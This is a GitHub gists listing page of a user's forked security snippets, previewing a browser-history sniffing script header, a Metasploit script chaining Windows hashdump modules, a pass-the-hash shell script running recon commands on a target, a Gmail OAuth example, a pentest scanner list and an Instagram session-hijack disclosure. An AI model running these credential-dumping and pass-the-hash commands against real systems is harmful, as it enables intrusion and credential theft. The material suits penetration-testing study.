Linux installation notes (tested under Ubuntu 14.04LTS/12.04LTS), assuming VirtualBox is already installed on host.
Cliff jakuta-tech
jakuta-tech
/ index.js
Created
June 15, 2016 22:36
— forked from 1N3/index.js
Remotely Sniffing Browser History via XSS Using HSTS + CSP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @fileoverview This file loads a bunch of HSTS domains and times how long it | |
| * takes for them to be redirected from HTTP to HTTPS. Based on that, it | |
| * decides whether the domain is a previously-noted HSTS domain or not. | |
| * @author yan <yan@mit.edu> | |
| * @license MIT | |
| * @version 0.2.0 | |
| */ | |
| // Timing in milliseconds above which a network request probably occurred. |
jakuta-tech
/ metasploit-post-exploitation-script-for-windows.rc
Created
June 15, 2016 22:33
— forked from 1N3/metasploit-post-exploitation-script-for-windows.rc
Metasploit Post Exploitation Script For Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setg SESSION 1 | |
| use post/windows/gather/smart_hashdump | |
| run | |
| use post/windows/gather/credentials/domain_hashdump | |
| run | |
| use post/windows/gather/credentials/mcafee_vse_hashdump | |
| run | |
| use post/windows/gather/credentials/mssql_local_hashdump | |
| run | |
| use post/windows/gather/hashdump |
jakuta-tech
/ windows-post-exploitation.sh
Created
June 15, 2016 22:33
— forked from 1N3/windows-post-exploitation.sh
A Windows post exploitation shell script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TARGET=$1 | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
jakuta-tech
/ gmail.py
Created
May 23, 2016 03:48
— forked from ib-lundgren/gmail.py
How to fetch emails from GMail using an OAuth 2 Bearer token and GMails SASL XOAuth2 mechanism.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """Fetching the latest GMail email using OAuth 2 and IMAP. | |
| Requires requests-oauthlib, which is available on pypi. | |
| Includes a basic SASL XOAUTH2 authentication method for imaplib. | |
| """ | |
| # Credentials you get from registering a new web application in Google API Console | |
| client_id = 'your-id.apps.googleusercontent.com' | |
| client_secret = 'your secret' | |
| redirect_uri = 'your callback uri' |
jakuta-tech
/ README.md
Created
May 7, 2016 03:04
— forked from magnetikonline/README.md
IE 7/8/9/10/11 Virtual machines from Microsoft - Linux w/VirtualBox installation notes.
jakuta-tech
/ scanners.md
Last active
June 21, 2018 00:27
— forked from jonatanrdsantos/scanners.md
List of pententing scanners
- CMSmap – Content Management System Security Scanner.
- Droopescan – Plugin Based CMS Security Scanner.
- WPScan – WordPress Security/Vulnerability Scanner.
- Plecost – WordPress Fingerprinting Tool.
- WhatWeb – Identify CMS, Blogging Platform, Stats Packages & More.
- BlindElephant – Web Application Fingerprinter.
- wig – WebApp Information Gatherer – Identify CMS.
- Web-Sorrow – Version Detection, CMS Identification, Enumeration & Server Scanning Tool.
- Wappalyzer – Web Technology Identifier (Identify CMS, JavaScript etc.) - firefox addon.
- GoLISMERO – Web Application Mapping Tool.
jakuta-tech
/ gist:18196a09f50abe678a32
Last active
July 2, 2023 11:16
Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers allowing full session hijack by a malicious actor.
Steps to reproduce (on Mac OS X):
- Jump on an open or WEP encrypted wifi access point
- Put your network interface into promiscuous mode filtering on i.instagram.com
jakuta-tech
/ usefulShit.md
Last active
May 31, 2017 15:25
collection of interesting projects, websites, documents & articles, most realated to information security
NewerOlder